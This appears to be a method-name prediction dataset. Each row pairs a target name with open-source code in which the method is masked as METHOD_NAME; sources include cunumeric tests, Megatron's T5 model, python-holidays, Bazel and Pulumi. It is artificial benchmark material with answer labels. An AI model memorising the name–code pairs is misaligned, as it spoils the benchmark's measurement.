with pytest.raises(checks_mod.SkipCheck, match="network checks not enabled"):
init_check(checks_mod.NetworkCheck, options)
def test_network_enabled(self, tool):
options, _ = tool.parse_args(["scan", "--net"])
assert init_check(checks_mod.NetworkCheck, options) | null |
test creation bad type | # Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from itertools import product
import numpy as np
import pytest
import cunumeric as num
def test_array():
x = num.array([1, 2, 3])
y = np.array([1, 2, 3])
z = num.array(y)
assert np.array_equal(x, z)
assert x.dtype == z.dtype
x = num.array([1, 2, 3])
y = num.array(x)
assert num.array_equal(x, y)
assert x.dtype == y.dtype
CREATION_FUNCTIONS = ("zeros", "ones")
FILLED_VALUES = [0, 1, 1000, 123.456]
SIZES = (0, 1, 2)
NDIMS = 5
DTYPES = (np.uint32, np.int32, np.float64, np.complex128)
def test_empty():
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num.empty(shape, dtype=dtype)
yf = np.empty(shape, dtype=dtype)
assert xf.shape == yf.shape
assert xf.dtype == yf.dtype
@pytest.mark.parametrize("fn", CREATION_FUNCTIONS)
def test_creation_func(fn):
num_f = getattr(num, fn)
np_f = getattr(np, fn)
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num_f(shape, dtype=dtype)
yf = np_f(shape, dtype=dtype)
assert np.array_equal(xf, yf)
assert xf.dtype == yf.dtype
@pytest.mark.parametrize("value", FILLED_VALUES)
def test_full(value):
par = (SIZES, range(NDIMS), DTYPES)
for size, ndims, dtype in product(*par):
shape = ndims * [size]
xf = num.full(shape, value, dtype=dtype)
yf = np.full(shape, value, dtype=dtype)
assert np.array_equal(xf, yf)
assert xf.dtype == yf.dtype
SHAPES_NEGATIVE = [
-1,
(-1, 2, 3),
np.array([2, -3, 4]),
]
class TestCreationErrors:
def setup_method(self):
self.bad_type_shape = (2, 3.0)
@pytest.mark.parametrize("shape", SHAPES_NEGATIVE, ids=str)
class TestNegativeShape:
@pytest.mark.parametrize("fn", ("empty", "zeros", "ones"))
def test_creation(self, shape, fn):
with pytest.raises(ValueError):
getattr(num, fn)(shape)
def test_full(self, shape):
with pytest.raises(ValueError):
num.full(shape, 10)
@pytest.mark.parametrize("fn", ("empty", "zeros", "ones"))
def METHOD_NAME(self, fn):
with pytest.raises(TypeError):
getattr(num, fn)(self.bad_type_shape)
def test_full_bad_type(self):
with pytest.raises(TypeError):
num.full(self.bad_type_shape, 10)
# additional special case for full
def test_full_bad_filled_value(self):
with pytest.raises(ValueError):
num.full((2, 3), [10, 20, 30])
DATA_ARGS = [
# Array scalars
(np.array(3.0), None),
(np.array(3), "f8"),
# 1D arrays
(np.array([]), None),
(np.arange(6, dtype="f4"), None),
(np.arange(6), "c16"),
# 2D arrays
(np.array([[]]), None),
(np.arange(6).reshape(2, 3), None),
(np.arange(6).reshape(3, 2), "i1"),
# 3D arrays
(np.array([[[]]]), None),
(np.arange(24).reshape(2, 3, 4), None),
(np.arange(24).reshape(4, 3, 2), "f4"),
]
LIKE_FUNCTIONS = ("zeros_like", "ones_like")
SHAPE_ARG = (None, (-1,), (1, -1))
@pytest.mark.parametrize("x_np,dtype", DATA_ARGS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_empty_like(x_np, dtype, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
x = num.array(x_np)
xfl = num.empty_like(x, dtype=dtype, shape=shape)
yfl = np.empty_like(x_np, dtype=dtype, shape=shape)
assert xfl.shape == yfl.shape
assert xfl.dtype == yfl.dtype
@pytest.mark.parametrize("x_np,dtype", DATA_ARGS)
@pytest.mark.parametrize("fn", LIKE_FUNCTIONS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_func_like(fn, x_np, dtype, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
num_f = getattr(num, fn)
np_f = getattr(np, fn)
x = num.array(x_np)
xfl = num_f(x, dtype=dtype, shape=shape)
yfl = np_f(x_np, dtype=dtype, shape=shape)
assert np.array_equal(xfl, yfl)
assert xfl.dtype == yfl.dtype
@pytest.mark.parametrize("value", FILLED_VALUES)
@pytest.mark.parametrize("x_np, dtype", DATA_ARGS)
@pytest.mark.parametrize("shape", SHAPE_ARG)
def test_full_like(x_np, dtype, value, shape):
shape = shape if shape is None else x_np.reshape(shape).shape
x = num.array(x_np)
xfl = num.full_like(x, value, dtype=dtype, shape=shape)
yfl = np.full_like(x_np, value, dtype=dtype, shape=shape)
assert np.array_equal(xfl, yfl)
assert xfl.dtype == yfl.dtype
def test_full_like_bad_filled_value():
x = num.array([[1, 2, 3], [4, 5, 6]])
with pytest.raises(ValueError):
num.full_like(x, [10, 20, 30])
ARANGE_ARGS = [
(0,),
(10,),
(3.5,),
(3.0, 8, None),
(-10,),
(2, 10),
(2, -10),
(-2.5, 10.0),
(1, -10, -2.5),
(1.0, -10.0, -2.5),
(-10, 10, 10),
(-10, 10, -100),
]
@pytest.mark.parametrize("args", ARANGE_ARGS, ids=str)
def test_arange(args):
x = num.arange(*args)
y = np.arange(*args)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
@pytest.mark.parametrize("dtype", [np.int32, np.float64], ids=str)
@pytest.mark.parametrize("args", ARANGE_ARGS, ids=str)
def test_arange_with_dtype(args, dtype):
x = num.arange(*args, dtype=dtype)
y = np.arange(*args, dtype=dtype)
assert np.array_equal(x, y)
assert x.dtype == y.dtype
ARANGE_ARGS_STEP_ZERO = [
(0, 0, 0),
(0, 10, 0),
(-10, 10, 0),
(1, 10, 0),
(10, -10, 0),
(0.0, 0.0, 0.0),
(0.0, 10.0, 0.0),
(-10.0, 10.0, 0.0),
(1.0, 10.0, 0.0),
(10.0, -10.0, 0.0),
]
class TestArrangeErrors:
def test_inf(self):
with pytest.raises(OverflowError):
num.arange(0, num.inf)
def test_nan(self):
with pytest.raises(ValueError):
num.arange(0, 1, num.nan)
@pytest.mark.parametrize("args", ARANGE_ARGS_STEP_ZERO, ids=str)
def test_zero_division(self, args):
with pytest.raises(ZeroDivisionError):
num.arange(*args)
def test_zero_with_nd_ndarray_shape():
shape = num.array([2, 3, 4])
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
shape = np.array([2, 3, 4])
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
def test_zero_with_0d_ndarray_shape():
shape = num.array(3)
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
shape = np.array(3)
x = num.zeros(shape)
y = np.zeros(shape)
assert np.array_equal(x, y)
if __name__ == "__main__":
import sys
sys.exit(pytest.main(sys.argv)) | null |
rotation2 | # coding: utf-8
# /*##########################################################################
#
# Copyright (C) 2016-2018 European Synchrotron Radiation Facility
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
# ###########################################################################*/
__authors__ = ["V. Valls"]
__license__ = "MIT"
__date__ = "16/10/2020"
from .AbstractModel import AbstractModel
from .ConstraintModel import ConstraintModel
class GeometryConstraintsModel(AbstractModel):
def __init__(self, parent=None):
super(GeometryConstraintsModel, self).__init__(parent)
self.__distance = ConstraintModel(self)
self.__wavelength = ConstraintModel(self)
self.__poni1 = ConstraintModel(self)
self.__poni2 = ConstraintModel(self)
self.__rotation1 = ConstraintModel(self)
self.__rotation2 = ConstraintModel(self)
self.__rotation3 = ConstraintModel(self)
self.__distance.changed.connect(self.wasChanged)
self.__wavelength.changed.connect(self.wasChanged)
self.__poni1.changed.connect(self.wasChanged)
self.__poni2.changed.connect(self.wasChanged)
self.__rotation1.changed.connect(self.wasChanged)
self.__rotation2.changed.connect(self.wasChanged)
self.__rotation3.changed.connect(self.wasChanged)
def isValid(self):
if not self.__distance.isValid():
return False
if not self.__wavelength.isValid():
return False
if not self.__poni1.isValid():
return False
if not self.__poni2.isValid():
return False
if not self.__rotation1.isValid():
return False
if not self.__rotation2.isValid():
return False
if not self.__rotation3.isValid():
return False
return True
def distance(self):
return self.__distance
def wavelength(self):
return self.__wavelength
def poni1(self):
return self.__poni1
def poni2(self):
return self.__poni2
def rotation1(self):
return self.__rotation1
def METHOD_NAME(self):
return self.__rotation2
def rotation3(self):
return self.__rotation3
def copy(self, parent=None):
"""
Copy this model to a new model
:param qt.QObject parent: Parent of the copied model
:rtype: GeometryConstraintsModel
"""
model = GeometryConstraintsModel(parent=parent)
model.distance().set(self.__distance)
model.wavelength().set(self.__wavelength)
model.poni1().set(self.__poni1)
model.poni2().set(self.__poni2)
model.rotation1().set(self.__rotation1)
model.METHOD_NAME().set(self.__rotation2)
model.rotation3().set(self.__rotation3)
return model
def set(self, other):
"""Set this geometry constraints with the other informations.
:param GeometryConstraintsModel other:
"""
self.lockSignals()
self.distance().set(other.distance())
self.wavelength().set(other.wavelength())
self.poni1().set(other.poni1())
self.poni2().set(other.poni2())
self.rotation1().set(other.rotation1())
self.METHOD_NAME().set(other.METHOD_NAME())
self.rotation3().set(other.rotation3())
self.unlockSignals()
def fillDefault(self, other):
"""Fill unset values of this model with the other model
:param GeometryConstraintsModel other:
"""
self.lockSignals()
self.distance().fillDefault(other.distance())
self.wavelength().fillDefault(other.wavelength())
self.poni1().fillDefault(other.poni1())
self.poni2().fillDefault(other.poni2())
self.rotation1().fillDefault(other.rotation1())
self.METHOD_NAME().fillDefault(other.METHOD_NAME())
self.rotation3().fillDefault(other.rotation3())
self.unlockSignals()
def __str__(self):
template = "GeometryConstraintsModel(d:%s, w:%s, p1:%s, p2:%s, r1:%s, r2:%s, r3:%s)"
data = self.distance(), self.wavelength(), self.poni1(), self.poni2(), self.rotation1(), self.METHOD_NAME(), self.rotation3()
return template % data | null |
set input tensor | # Copyright (c) 2022, NVIDIA CORPORATION. All rights reserved.
"""T5 model."""
import torch
from megatron import get_args
from megatron.core import tensor_parallel
from megatron.model.enums import AttnMaskType
from megatron.model.language_model import parallel_lm_logits, get_language_model
from megatron.model import LayerNorm
from megatron.model.utils import (
openai_gelu,
get_linear_layer
)
from .module import MegatronModule
def t5_extended_attention_mask(attention_mask_list):
def attn_mask_postprocess(attn_mask):
# [b, 1, s, s]
extended_attention_mask = attn_mask.unsqueeze(1)
return extended_attention_mask
return [attn_mask_postprocess(attn_mask) for attn_mask in attention_mask_list]
def t5_position_ids(token_ids):
# Create position ids
seq_length = token_ids.size(1)
position_ids = torch.arange(seq_length, dtype=torch.long,
device=token_ids.device)
position_ids = position_ids.unsqueeze(0).expand_as(token_ids)
return position_ids
class T5LMHead(MegatronModule):
"""Masked LM head for T5
Arguments:
mpu_vocab_size: model parallel size of vocabulary.
parallel_output: whether output logits are distributed or not.
"""
def __init__(self, mpu_vocab_size, parallel_output):
super(T5LMHead, self).__init__()
self.bias = torch.nn.Parameter(torch.zeros(mpu_vocab_size))
self.bias.model_parallel = True
self.bias.partition_dim = 0
self.bias.stride = 1
self.parallel_output = parallel_output
def forward(self, hidden_states, word_embeddings_weight):
output = parallel_lm_logits(hidden_states,
word_embeddings_weight,
self.parallel_output,
bias=self.bias)
return output
class T5Model(MegatronModule):
"""T5 Language model."""
def __init__(self,
config,
num_tokentypes=0,
parallel_output=True,
pre_process=True,
post_process=True,
add_encoder=True,
add_decoder=True):
super().__init__(config=config)
args = get_args()
self.fp16_lm_cross_entropy = args.fp16_lm_cross_entropy
self.parallel_output = parallel_output
self.pre_process = pre_process
self.post_process = post_process
self.add_encoder = add_encoder
self.add_decoder = add_decoder
self.language_model, self._language_model_key = get_language_model(
config=config,
num_tokentypes=num_tokentypes,
add_pooler=False,
add_encoder=add_encoder,
add_decoder=add_decoder,
encoder_attn_mask_type=AttnMaskType.padding,
pre_process=self.pre_process,
post_process=self.post_process)
self.initialize_word_embeddings()
if self.post_process and self.add_decoder:
self.lm_head = T5LMHead(
self.shared_embedding_or_output_weight().size(0),
parallel_output)
self._lm_head_key = 'lm_head'
def METHOD_NAME(self, input_tensor):
"""See megatron.model.transformer.set_input_tensor()"""
self.language_model.METHOD_NAME(input_tensor)
def forward(self, encoder_input_ids, decoder_input_ids, encoder_attn_mask,
decoder_attn_mask, encoder_decoder_attn_mask,
tokentype_ids=None, lm_labels=None, enc_hidden_states=None):
# Converting the attention masks to proper parameter settings
encoder_attn_mask, decoder_attn_mask, encoder_decoder_attn_mask = t5_extended_attention_mask(
[encoder_attn_mask, decoder_attn_mask, encoder_decoder_attn_mask])
encoder_position_ids = t5_position_ids(encoder_input_ids)
decoder_position_ids = t5_position_ids(decoder_input_ids)
lm_output = self.language_model(encoder_input_ids,
encoder_position_ids,
encoder_attn_mask,
decoder_input_ids,
decoder_position_ids,
decoder_attn_mask,
encoder_decoder_attn_mask,
tokentype_ids=tokentype_ids,
enc_hidden_states=enc_hidden_states)
if self.post_process and self.add_decoder:
decoder_output, encoder_output = lm_output
# Output. [s, b, h]
lm_logits = self.lm_head(decoder_output,
self.shared_embedding_or_output_weight())
if lm_labels is None:
# [s b h] => [b s h]
return lm_logits.transpose(0,1).contiguous()
else:
# [b s] => [s b]
lm_labels = lm_labels.transpose(0,1).contiguous()
if self.fp16_lm_cross_entropy:
assert lm_logits.dtype == torch.half
lm_loss = tensor_parallel.vocab_parallel_cross_entropy(lm_logits, lm_labels)
else:
lm_loss = tensor_parallel.vocab_parallel_cross_entropy(lm_logits.float(),
lm_labels)
# [s b] => [b s]
lm_loss = lm_loss.transpose(0,1).contiguous()
return lm_loss
elif self.add_decoder and not self.add_encoder:
decoder_output, encoder_output = lm_output
return decoder_output
else:
encoder_output = lm_output
return encoder_output
def state_dict_for_save_checkpoint(self, prefix='', keep_vars=False):
"""For easy load when model is combined with other heads,
add an extra key."""
state_dict_ = {}
state_dict_[self._language_model_key] \
= self.language_model.state_dict_for_save_checkpoint(prefix=prefix,
keep_vars=keep_vars)
if self.post_process and self.add_decoder:
state_dict_[self._lm_head_key] \
= self.lm_head.state_dict_for_save_checkpoint(prefix=prefix,
keep_vars=keep_vars)
# Save word_embeddings.
if self.post_process and not self.pre_process and self.add_decoder:
state_dict_[self._word_embeddings_for_head_key] \
= self.word_embeddings.state_dict(prefix=prefix,
keep_vars=keep_vars)
return state_dict_
def load_state_dict(self, state_dict, strict=True):
"""Customized load."""
self.language_model.load_state_dict(
state_dict[self._language_model_key], strict=strict)
if self.post_process and self.add_decoder:
self.lm_head.load_state_dict(state_dict[self._lm_head_key],
strict=strict)
# Load word embeddings.
if self.post_process and not self.pre_process and self.add_decoder:
self.word_embeddings.load_state_dict(
state_dict[self._word_embeddings_for_head_key], strict=strict) | null |
test no holidays | # python-holidays
# ---------------
# A fast, efficient Python library for generating country, province and state
# specific sets of holidays on the fly. It aims to make determining whether a
# specific date is a holiday as fast and flexible as possible.
#
# Authors: dr-prodigy <[email protected]> (c) 2017-2023
# ryanss <[email protected]> (c) 2014-2017
# Website: https://github.com/dr-prodigy/python-holidays
# License: MIT (see LICENSE file)
from holidays.countries.russia import Russia, RU, RUS
from tests.common import TestCase
class TestRussia(TestCase):
@classmethod
def setUpClass(cls):
super().setUpClass(Russia, years=range(1991, 2025))
def test_country_aliases(self):
self.assertCountryAliases(Russia, RU, RUS)
def METHOD_NAME(self):
self.assertNoHolidays(Russia(years=1990))
def test_special_holidays(self):
self.assertHoliday(
"2023-02-24",
"2023-05-08",
)
def test_new_year(self):
name_1 = "Новый год"
name_2 = "Новогодние каникулы"
self.assertHolidayName(name_1, (f"{year}-01-01" for year in range(1991, 2005)))
self.assertHolidayName(name_1, (f"{year}-01-02" for year in range(1993, 2005)))
self.assertNoHoliday(f"{year}-01-02" for year in range(1991, 1992))
for year in range(2005, 2025):
self.assertHolidayName(
name_2,
f"{year}-01-01",
f"{year}-01-02",
f"{year}-01-03",
f"{year}-01-04",
f"{year}-01-05",
)
for year in range(2013, 2025):
self.assertHolidayName(name_2, f"{year}-01-06", f"{year}-01-08")
for year in range(1991, 2005):
self.assertNoHoliday(f"{year}-01-03", f"{year}-01-04", f"{year}-01-05")
for year in range(1991, 2013):
self.assertNoHoliday(f"{year}-01-06", f"{year}-01-08")
self.assertNoHolidayName(name_1, range(2005, 2025))
self.assertNoHolidayName(name_2, range(1991, 2005))
def test_christmas_day(self):
self.assertHolidayName(
"Рождество Христово", (f"{year}-01-07" for year in range(1991, 2025))
)
def test_defender_of_fatherland_day(self):
name = "День защитника Отечества"
self.assertHolidayName(name, (f"{year}-02-23" for year in range(2002, 2025)))
self.assertNoHoliday(f"{year}-02-23" for year in range(1991, 2002))
self.assertNoHolidayName(name, range(1991, 2002))
def test_international_womens_day(self):
self.assertHolidayName(
"Международный женский день", (f"{year}-03-08" for year in range(1991, 2025))
)
def test_labor_day(self):
name_1 = "День международной солидарности трудящихся"
name_2 = "Праздник Весны и Труда"
self.assertHolidayName(name_1, "1991-05-01", "1991-05-02")
self.assertHolidayName(name_2, (f"{year}-05-01" for year in range(1992, 2025)))
self.assertHolidayName(name_2, (f"{year}-05-02" for year in range(1992, 2005)))
self.assertNoHoliday(f"{year}-05-02" for year in range(2005, 2025))
self.assertNoHolidayName(name_1, range(1992, 2025))
self.assertNoHolidayName(name_2, 1991)
def test_victory_day(self):
self.assertHolidayName("День Победы", (f"{year}-05-09" for year in range(1991, 2025)))
def test_russia_day(self):
name_1 = "День принятия Декларации о государственном суверенитете Российской Федерации"
name_2 = "День России"
self.assertHolidayName(name_1, (f"{year}-06-12" for year in range(1992, 2002)))
self.assertHolidayName(name_2, (f"{year}-06-12" for year in range(2002, 2025)))
self.assertNoHoliday("1991-06-12")
self.assertNoHolidayName(name_1, 1991, range(2002, 2025))
self.assertNoHolidayName(name_2, range(1991, 2002))
def test_unity_day(self):
name = "День народного единства"
self.assertHolidayName(name, (f"{year}-11-04" for year in range(2005, 2025)))
self.assertNoHoliday(f"{year}-11-04" for year in range(1991, 2005))
self.assertNoHolidayName(name, range(1991, 2005))
def test_october_revolution(self):
name_1 = "Годовщина Великой Октябрьской социалистической революции"
name_2 = "День согласия и примирения"
self.assertHolidayName(name_1, (f"{year}-11-07" for year in range(1991, 1996)))
self.assertHolidayName(name_1, "1991-11-08")
self.assertHolidayName(name_2, (f"{year}-11-07" for year in range(1996, 2005)))
self.assertNoHoliday(f"{year}-11-07" for year in range(2005, 2025))
self.assertNoHoliday(f"{year}-11-08" for year in range(1992, 2025))
self.assertNoHolidayName(name_1, range(1996, 2025))
self.assertNoHolidayName(name_2, range(1991, 1996), range(2005, 2025))
def test_2018(self):
self.assertHolidays(
Russia(years=2018),
("2018-01-01", "Новогодние каникулы"),
("2018-01-02", "Новогодние каникулы"),
("2018-01-03", "Новогодние каникулы"),
("2018-01-04", "Новогодние каникулы"),
("2018-01-05", "Новогодние каникулы"),
("2018-01-06", "Новогодние каникулы"),
("2018-01-07", "Рождество Христово"),
("2018-01-08", "Новогодние каникулы"),
("2018-02-23", "День защитника Отечества"),
("2018-03-08", "Международный женский день"),
("2018-05-01", "Праздник Весны и Труда"),
("2018-05-09", "День Победы"),
("2018-06-12", "День России"),
("2018-11-04", "День народного единства"),
)
def test_l10n_default(self):
self.assertLocalizedHolidays(
("2018-01-01", "Новогодние каникулы"),
("2018-01-02", "Новогодние каникулы"),
("2018-01-03", "Новогодние каникулы"),
("2018-01-04", "Новогодние каникулы"),
("2018-01-05", "Новогодние каникулы"),
("2018-01-06", "Новогодние каникулы"),
("2018-01-07", "Рождество Христово"),
("2018-01-08", "Новогодние каникулы"),
("2018-02-23", "День защитника Отечества"),
("2018-03-08", "Международный женский день"),
("2018-05-01", "Праздник Весны и Труда"),
("2018-05-09", "День Победы"),
("2018-06-12", "День России"),
("2018-11-04", "День народного единства"),
)
def test_l10n_en_us(self):
self.assertLocalizedHolidays(
"en_US",
("2018-01-01", "New Year Holidays"),
("2018-01-02", "New Year Holidays"),
("2018-01-03", "New Year Holidays"),
("2018-01-04", "New Year Holidays"),
("2018-01-05", "New Year Holidays"),
("2018-01-06", "New Year Holidays"),
("2018-01-07", "Christmas Day"),
("2018-01-08", "New Year Holidays"),
("2018-02-23", "Fatherland Defender's Day"),
("2018-03-08", "International Women's Day"),
("2018-05-01", "Holiday of Spring and Labor"),
("2018-05-09", "Victory Day"),
("2018-06-12", "Russia Day"),
("2018-11-04", "Unity Day"),
) | null |
impl | # Copyright 2018 The Bazel Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines a test rule that asserts the number of output files in another rule.
This rule operates in Bazel's analysis phase, not in its execution phase, and so
it's faster than a conventional test rule would be.
Furthermore this rule's action does not depend on any of the inputs (because the
assertion is done in the analysis phase) so Bazel won't even build the input
files to run the test. The test has constant execution time.
=== Use ===
Use this rule to assert the size of a filegroup or any other rule and catch
sudden, unexpected changes in the size.
The `margin` attribute allows specifying a tolerance value (percentage), to
allow for organic, expected growth or shrinkage of the target rule.
=== Example ===
The "resources_size_test" test fails if the number of files in
"resources" changes from 123 by more than 3 percent:
filegroup(
name = "resources",
srcs = glob(["**"]) + [
"//foo/bar:resources"
"//baz:resources",
],
)
rule_size_test(
name = "resources_size_test",
src = ":resources",
# Expect 123 files in ":resources", with an error margin of 3% to allow
# for slight changes.
expect = 123,
margin = 3,
)
"""
def METHOD_NAME(ctx):
if ctx.attr.expect < 0:
fail("ERROR: rule_size_test.expect must be positive")
if ctx.attr.margin < 0 or ctx.attr.margin > 100:
# Do not allow more than 100% change in size.
fail("ERROR: rule_size_test.margin must be in range [0..100]")
if ctx.attr.expect == 0 and ctx.attr.margin != 0:
# Allow no margin when expecting 0 files, to avoid division by zero.
fail("ERROR: rule_size_test.margin must be 0 when " +
"rule_size_test.expect is 0")
amount = len(ctx.attr.src[DefaultInfo].files.to_list())
if ctx.attr.margin > 0:
if amount >= ctx.attr.expect:
diff = amount - ctx.attr.expect
else:
diff = ctx.attr.expect - amount
if ((diff * 100) // ctx.attr.expect) > ctx.attr.margin:
fail(("ERROR: rule_size_test: expected %d file(s) within %d%% " +
"error margin, got %d file(s) (%d%% difference)") % (
ctx.attr.expect,
ctx.attr.margin,
amount,
(diff * 100) // ctx.attr.expect,
))
elif amount != ctx.attr.expect:
fail(("ERROR: rule_size_test: expected exactly %d file(s), got %d " +
"file(s)") % (ctx.attr.expect, amount))
if ctx.attr.is_windows:
test_bin = ctx.actions.declare_file(ctx.label.name + ".bat")
# CreateProcessW can launch .bat files directly as long as they are NOT
# empty. Therefore we write a .bat file with a comment in it.
ctx.actions.write(
output = test_bin,
content = "@REM dummy",
is_executable = True,
)
else:
test_bin = ctx.actions.declare_file(ctx.label.name + ".sh")
ctx.actions.write(
output = test_bin,
content = "#!/bin/sh",
is_executable = True,
)
return [DefaultInfo(executable = test_bin)]
_rule_size_test = rule(
implementation = METHOD_NAME,
attrs = {
# The target whose number of output files this rule asserts. The number
# of output files is the size of the target's DefaultInfo.files field.
"src": attr.label(allow_files = True),
# A non-negative integer, the expected number of files that the target
# in `src` outputs. If 0, then `margin` must also be 0.
"expect": attr.int(mandatory = True),
# A percentage value, in the range of [0..100]. Allows for tolerance in
# the difference between expected and actual number of files in `src`.
# If 0, then the target in `src` must output exactly `expect` many
# files.
"margin": attr.int(mandatory = True),
# True if running on Windows, False otherwise.
"is_windows": attr.bool(mandatory = True),
},
test = True,
)
def rule_size_test(name, **kwargs):
_rule_size_test(
name = name,
is_windows = select({
"@bazel_tools//src/conditions:windows": True,
"//conditions:default": False,
}),
**kwargs
) | null |
type | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
__all__ = [
'GetIntegrationAccountAssemblyResult',
'AwaitableGetIntegrationAccountAssemblyResult',
'get_integration_account_assembly',
'get_integration_account_assembly_output',
]
@pulumi.output_type
class GetIntegrationAccountAssemblyResult:
"""
The assembly definition.
"""
def __init__(__self__, id=None, location=None, name=None, properties=None, tags=None, METHOD_NAME=None):
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if location and not isinstance(location, str):
raise TypeError("Expected argument 'location' to be a str")
pulumi.set(__self__, "location", location)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if properties and not isinstance(properties, dict):
raise TypeError("Expected argument 'properties' to be a dict")
pulumi.set(__self__, "properties", properties)
if tags and not isinstance(tags, dict):
raise TypeError("Expected argument 'tags' to be a dict")
pulumi.set(__self__, "tags", tags)
if METHOD_NAME and not isinstance(METHOD_NAME, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", METHOD_NAME)
@property
@pulumi.getter
def id(self) -> str:
"""
The resource id.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def location(self) -> Optional[str]:
"""
The resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> str:
"""
Gets the resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def properties(self) -> 'outputs.AssemblyPropertiesResponse':
"""
The assembly properties.
"""
return pulumi.get(self, "properties")
@property
@pulumi.getter
def tags(self) -> Optional[Mapping[str, str]]:
"""
The resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def METHOD_NAME(self) -> str:
"""
Gets the resource type.
"""
return pulumi.get(self, "type")
class AwaitableGetIntegrationAccountAssemblyResult(GetIntegrationAccountAssemblyResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetIntegrationAccountAssemblyResult(
id=self.id,
location=self.location,
name=self.name,
properties=self.properties,
tags=self.tags,
METHOD_NAME=self.METHOD_NAME)
def get_integration_account_assembly(assembly_artifact_name: Optional[str] = None,
integration_account_name: Optional[str] = None,
resource_group_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetIntegrationAccountAssemblyResult:
"""
Get an assembly for an integration account.
Azure REST API version: 2019-05-01.
:param str assembly_artifact_name: The assembly artifact name.
:param str integration_account_name: The integration account name.
:param str resource_group_name: The resource group name.
"""
__args__ = dict()
__args__['assemblyArtifactName'] = assembly_artifact_name
__args__['integrationAccountName'] = integration_account_name
__args__['resourceGroupName'] = resource_group_name
opts = pulumi.InvokeOptions.merge(_utilities.get_invoke_opts_defaults(), opts)
__ret__ = pulumi.runtime.invoke('azure-native:logic:getIntegrationAccountAssembly', __args__, opts=opts, typ=GetIntegrationAccountAssemblyResult).value
return AwaitableGetIntegrationAccountAssemblyResult(
id=pulumi.get(__ret__, 'id'),
location=pulumi.get(__ret__, 'location'),
name=pulumi.get(__ret__, 'name'),
properties=pulumi.get(__ret__, 'properties'),
tags=pulumi.get(__ret__, 'tags'),
METHOD_NAME=pulumi.get(__ret__, 'type'))
@_utilities.lift_output_func(get_integration_account_assembly)
def get_integration_account_assembly_output(assembly_artifact_name: Optional[pulumi.Input[str]] = None,
integration_account_name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetIntegrationAccountAssemblyResult]:
"""
Get an assembly for an integration account.
Azure REST API version: 2019-05-01.
:param str assembly_artifact_name: The assembly artifact name.
:param str integration_account_name: The integration account name.
:param str resource_group_name: The resource group name.
"""
... | null |
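# Hedged usage sketch (illustrative only, not part of the generated SDK): inside a
# Pulumi program the output-style lookup above can be consumed as shown below.
# All three resource names are placeholders.
def _example_lookup() -> pulumi.Output[str]:
    assembly = get_integration_account_assembly_output(
        resource_group_name="example-rg",
        integration_account_name="example-integration-account",
        assembly_artifact_name="example-assembly")
    # The result is a pulumi.Output wrapping GetIntegrationAccountAssemblyResult;
    # use .apply() to project fields from it once it resolves.
    return assembly.apply(lambda result: result.id)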
wrk data | #!/usr/bin/python3
import sys
import re
import subprocess
wrkcmd = 'wrk'
separator = ';'
def METHOD_NAME(wrk_output):
return str(wrk_output.get('lat_avg')) + separator + str(wrk_output.get('lat_stdev')) + separator + str(
wrk_output.get('lat_max')) + separator + str(wrk_output.get('req_avg')) + separator + str(
